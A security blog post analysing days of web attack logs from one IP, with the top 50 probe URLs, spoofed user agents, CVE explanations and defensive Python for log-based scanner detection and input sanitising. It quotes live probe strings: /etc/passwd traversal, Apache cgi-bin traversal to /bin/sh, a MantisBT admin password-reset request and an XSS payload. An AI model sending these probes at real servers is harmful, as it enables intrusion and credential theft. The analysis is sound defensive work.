We spend a lot of hours per day looking at attacks and logs of attacks, both here at Trunc and at NOC for our WAF and CDN. One IP has been hitting several of our sites every day for multiple days. Most of the attack attempts are blocked automatically, but I thought it would be interesting to go through some of them and share them here.
The attacker IP 50.16.95.X has been the number one abuser on our network for the past few days, trying different platforms, including WordPress, Joomla, Mantis Bug Tracker, OpenX/Revive Adserver, and others.
This IP requested known-vulnerable endpoints at an average rate of 30 requests per minute, with bursts of 150-200 requests per minute in some periods. It has been continuous for days, which leads us to believe that the attacker is combining a vulnerability scanning tool with custom pen-testing tooling.
Overall, we counted more than 200,000 attack attempts from this single IP in just the past few days.
Here are the top 50 most frequent attack URLs observed in the logs, targeting various platforms. These attack requests demonstrate attempts to exploit known vulnerabilities in platforms such as WordPress, Joomla, and Mantis Bug Tracker. Below is a summary of the URLs used:
1. GET /mantis/verify.php?id=1&confirm_hash
2. GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash
3. GET /openx/www/delivery/lg.php?dest=http://interact.sh
4. GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar
5. GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd
6. GET /system/login/SysLoginUser.aspx?Login=Denied&UID=XSS
7. GET /components/com_rwcards/captcha/captcha_image.php
8. GET /ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/
9. GET /mantis/admin/install.php?install=1
10. POST /wp-admin/admin-post.php?action=save_changes&setting_page=plugin_options
11. GET /revive-adserver-4.1.1/www/delivery/avw.php?zoneid=1&cb=INSERT_XSS_PAYLOAD_HERE
12. GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchField=antani'+union+select...
13. GET /gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
14. GET /wp-content/plugins/wp-phpmyadmin-extension/custom_view.php?view=../../../../../../../../etc/passwd
15. POST /wp-json/wp/v2/users/me
16. GET /wp-content/themes/twentytwentyone/search.php?q=../../../../../etc/passwd
17. GET /xmlrpc.php?rsd
18. GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
19. GET /adminer-4.3.1.php
20. GET /wp-login.php?action=lostpassword
21. POST /ajax-api/2.0/mlflow-artifacts/create
22. GET /components/com_sobi2/config.php
23. GET /wp-admin/async-upload.php?action=upload
24. GET /wp-admin/user-new.php?action=createuser
25. GET /wp-content/plugins/all-in-one-wp-security-and-firewall/admin.php?action=admin-settings
26. GET /wp-content/plugins/limit-login-attempts/admin.php?action=login_attempts
27. GET /wp-admin/includes/admin-post.php?action=deleteuser
28. GET /wp-json/wp/v2/media
29. GET /system/Login/SysLoginUser.aspx?action=login
30. GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash
31. GET /joomla/configuration.php-dist
32. GET /administrator/index.php
33. GET /components/com_k2/store.php
34. GET /wp-content/uploads/
35. GET /wp-content/plugins/captcha/captcha_image.php
36. POST /wp-admin/options.php
37. GET /administrator/manifests/files/joomla.xml
38. GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/ls
39. POST /wp-json/oembed/1.0/embeds
40. GET /administrator/components/com_virtuemart/classes/xml/configuration.xml
41. GET /wp-login.php?action=lostpassword
42. GET /joomla/administrator/components/com_banners/controllers/admin.php
43. GET /wp-admin/admin-ajax.php?action=wp_login
44. GET /administrator/index.php?option=com_banners
45. GET /components/com_flexicontent/helpers/html.php
46. GET /joomla/index.php?option=com_plugins&view=plugin&pluginname=captcha
47. GET /administrator/components/com_media/helpers/images.php
48. GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/shutdown
49. POST /wp-admin/admin.php?page=wp_login
50. GET /xmlrpc.php?action=pingback.ping
The attacker used a total of **171 distinct user agents** throughout the attack. Here are the top user agents, listed by their frequency:
1. Mozilla/5.0 (CentOS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
2. Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
3. Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.23
4. Mozilla/5.0 (Linux; Android 10; SM-N950F Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36
5. Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
6. Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
7. Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
8. Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
9. Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
10. Mozilla/5.0 (X11; Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
11. Mozilla/5.0 (X11; Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
12. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
13. Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
14. Mozilla/5.0 (Linux; Android 11; SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Mobile Safari/537.36
15. Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A105F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Mobile Safari/537.36
16. Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
17. Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
18. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
The variety of user agents points to automated tooling that rotates browser identities to get past simple per-user-agent blocking and rate limits; this behavior is typical of vulnerability scanners and botnets. Many of these strings are spoofed copies of real browser signatures, so a legitimate-looking user agent on its own says nothing about whether a human is behind the request.
On the plus side, a single IP cycling through dozens of user agents within minutes is itself a strong bot signal, because normal browser traffic from one client keeps the same user agent for the whole session.
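The two signals above, request rate per minute and user-agent churn per source IP, are easy to compute from ordinary web server logs. The following Python script is an added example, not Trunc's or NOC's tooling: it parses constructed nginx/Apache combined-format log lines, builds a per-IP profile, tags requests that match a few signatures taken from the top-50 list, and flags IPs that rotate user agents, exceed a rate threshold, or send signature hits. The 30 req/min threshold is the average quoted above; the user-agent threshold of 3, the signature names, and the log lines themselves (TEST-NET addresses) are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in nginx/Apache "combined" log format. These lines are
# made up for this example and are not the Trunc/NOC logs.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Sep/2024:10:00:01 +0000] "GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1" 404 153 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
192.0.2.10 - - [14/Sep/2024:10:00:02 +0000] "GET /openx/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 153 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
192.0.2.10 - - [14/Sep/2024:10:00:02 +0000] "GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
192.0.2.10 - - [14/Sep/2024:10:00:03 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.23"
192.0.2.10 - - [14/Sep/2024:10:01:10 +0000] "GET /xmlrpc.php?rsd HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
198.51.100.7 - - [14/Sep/2024:10:00:05 +0000] "GET /blog/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
198.51.100.7 - - [14/Sep/2024:10:00:06 +0000] "GET /wp-content/themes/x/style.css HTTP/1.1" 200 2048 "https://example.com/blog/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Request-path signatures drawn from the top-50 list; the names are ours.
SIGNATURES = (
    ("mantis_verify", re.compile(r"/verify\.php\?id=\d+&confirm_hash(=|$)")),
    ("oast_callback", re.compile(r"dest=https?://[^/&]*interact\.sh", re.IGNORECASE)),
    ("path_traversal", re.compile(r"(\.\./|\.%2e/|%2e%2e/|/etc/passwd)", re.IGNORECASE)),
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def classify(path):
    """Names of every signature that matches the request path."""
    return [name for name, rx in SIGNATURES if rx.search(path)]


def profile_ips(lines):
    """Per-IP profile: total requests, distinct user agents, peak requests
    in any one-minute bucket, and signature hit counts."""
    per_ip = defaultdict(lambda: {"total": 0, "uas": set(),
                                  "minutes": defaultdict(int), "sigs": defaultdict(int)})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        p = per_ip[rec["ip"]]
        p["total"] += 1
        p["uas"].add(rec["ua"])
        p["minutes"][rec["ts"].replace(second=0)] += 1
        for sig in classify(rec["path"]):
            p["sigs"][sig] += 1
    return {
        ip: {
            "total": p["total"],
            "distinct_uas": len(p["uas"]),
            "peak_rpm": max(p["minutes"].values()),
            "sigs": dict(p["sigs"]),
        }
        for ip, p in per_ip.items()
    }


def flag_scanners(profiles, max_uas=3, max_rpm=30):
    """Map flagged IP -> list of reasons. Thresholds are assumptions:
    more than max_uas distinct user agents, more than max_rpm requests in a
    minute, or any signature hit."""
    flagged = {}
    for ip, p in profiles.items():
        reasons = []
        if p["distinct_uas"] > max_uas:
            reasons.append(f"{p['distinct_uas']} distinct user agents")
        if p["peak_rpm"] > max_rpm:
            reasons.append(f"peak {p['peak_rpm']} req/min")
        if p["sigs"]:
            hits = ", ".join(f"{k}={v}" for k, v in sorted(p["sigs"].items()))
            reasons.append("signature hits: " + hits)
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for ip, reasons in flag_scanners(profile_ips(SAMPLE_LOG.splitlines())).items():
        print(ip, "->", "; ".join(reasons))
```

Bucketing by minute keeps the rate check cheap on a large log and makes the 150-200 req/min bursts visible even when the daily average is far lower; the user-agent check is deliberately independent of the signature list, so it still fires on a scanner whose paths you have not written rules for yet.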
In addition to listing the top 50 attack requests, it’s crucial to understand the underlying vulnerabilities these requests are targeting. Below are detailed explanations of key attack vectors observed:
The attacker probed the Mantis Bug Tracker verification script under several install paths. Examples include:
GET /mantis/verify.php?id=1&confirm_hash
GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash
The combination of `id=1` (the first account created, normally the administrator) and an empty `confirm_hash` is the signature of the MantisBT password-reset flaw CVE-2017-7615, which affects versions through 2.3.0 (hence the `mantisbt-2.3.0` path): on a vulnerable install, an unauthenticated request to `verify.php` with an empty hash let the attacker set a new password for that account and log in as administrator.
The logs also show requests aimed at WordPress plugins through the `admin-ajax.php` endpoint. Plugin actions registered with the `wp_ajax_nopriv_` hook are reachable without logging in, which makes this a common entry point for XSS, CSRF and missing-authorization bugs in plugin code:
GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar
Attempts were made to abuse the click-logging script of OpenX / Revive Adserver as an open redirect:
GET /openx/www/delivery/lg.php?dest=http://interact.sh
The `dest` value is telling: interact.sh is the out-of-band callback service used by the open-source Nuclei scanner, so a request arriving at that domain would confirm to the attacker that the script redirected to, or fetched, an arbitrary URL. On a vulnerable install the same parameter is then used to send visitors of an ad to phishing or malware pages.
The following directory traversal attempt targeted the Joomla `com_jeformcr` component:
GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd
Reading `/etc/passwd` is the scanner's canary for confirming that the `view` parameter reaches a file read or include without being restricted to the component's own directory. Once that is confirmed, the same bug is used to read files that matter more, such as Joomla's `configuration.php`, which holds the database credentials.
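For the two input patterns behind the OpenX redirect probe and the Joomla traversal probe above, this is what safe handling looks like on the application side. It is an added Python example, not code from OpenX, Revive Adserver or Joomla (which are PHP); the function names, the allowed-host set and the base directory are assumptions. The checks carry over to any language: canonicalize first, compare against an allow-list, and fail closed.

```python
import os
from urllib.parse import urlsplit, unquote


def safe_redirect_target(dest, allowed_hosts):
    """Return dest only if it is a same-site path or an absolute http(s) URL on
    an allowed host; otherwise return "/" (fail closed).
    Rejects dest=http://interact.sh, scheme-relative //host, javascript:, and
    userinfo tricks such as https://ads.example.com@evil.example/."""
    if not dest or dest.startswith("//") or "\\" in dest:
        return "/"
    parts = urlsplit(dest)
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: only accept rooted paths so "evil.example" is not
        # interpreted as a host by a later Location header.
        return dest if dest.startswith("/") else "/"
    # urlsplit().hostname already strips userinfo and port, so the comparison
    # is against the host the browser would actually connect to.
    if parts.scheme in ("http", "https") and parts.hostname in allowed_hosts:
        return dest
    return "/"


def safe_view_path(base_dir, view, allowed_ext=".php"):
    """Resolve a user-supplied view name inside base_dir and refuse anything
    that escapes it, whatever the traversal depth or encoding.
    Returns the canonical path, or None when the request must be rejected."""
    base = os.path.realpath(base_dir)
    decoded = unquote(view)            # catch %2e%2e/ as well as ../
    if not decoded or "\x00" in decoded:
        return None
    candidate = os.path.realpath(os.path.join(base, decoded))
    # realpath has already collapsed ../ and followed symlinks, so a plain
    # prefix test on the canonical paths is sufficient.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not candidate.endswith(allowed_ext):
        return None
    return candidate


if __name__ == "__main__":
    # Hypothetical deployment values for the demo.
    hosts = {"ads.example.com"}
    for dest in ("http://interact.sh", "//interact.sh", "/landing?x=1",
                 "https://ads.example.com/landing", "https://ads.example.com@evil.example/"):
        print(f"redirect {dest!r:45} -> {safe_redirect_target(dest, hosts)!r}")
    for view in ("form.php", "../../../../../../../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"):
        print(f"view {view!r:40} -> {safe_view_path('/var/www/app/views', view)!r}")
```

Note what the traversal check does not rely on: there is no blacklist of `../` strings. The probe in the logs uses eight levels of `../`, but a scanner will just as happily send `%2e%2e/`, `..%2f` or a symlink-based path, and realpath plus a prefix comparison handles all of them the same way.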
Attempts were made to find reflected cross-site scripting (XSS) in an ASP.NET login page by injecting a script tag through the `UID` parameter:
GET /system/login/SysLoginUser.aspx?Login=Denied&UID=XSS%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
Decoded, the payload is `XSS</script><script>alert(document.domain)</script>`: the leading `</script>` closes any script block the value might be echoed into, and `alert(document.domain)` is the standard proof that injected script runs in the page's origin.
The attack patterns from IP 50.16.95.X show sustained, high-frequency probing of multiple platforms, using a wide array of spoofed user agents to obscure the activity. This kind of behavior is typical of vulnerability scanners or botnets working through lists of known software vulnerabilities. Note that not all of the probes are aimed at a CMS: the `/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh` requests in the list target the Apache HTTP Server 2.4.49/2.4.50 path-traversal bug (CVE-2021-41773 and CVE-2021-42013), which gives command execution when mod_cgi is enabled, so the web server itself needs patching, not just the applications on it. Web administrators should keep all software up to date, remove components and plugins they do not use (most of the paths above belong to optional extensions), and deploy a Web Application Firewall (WAF) to absorb this kind of traffic.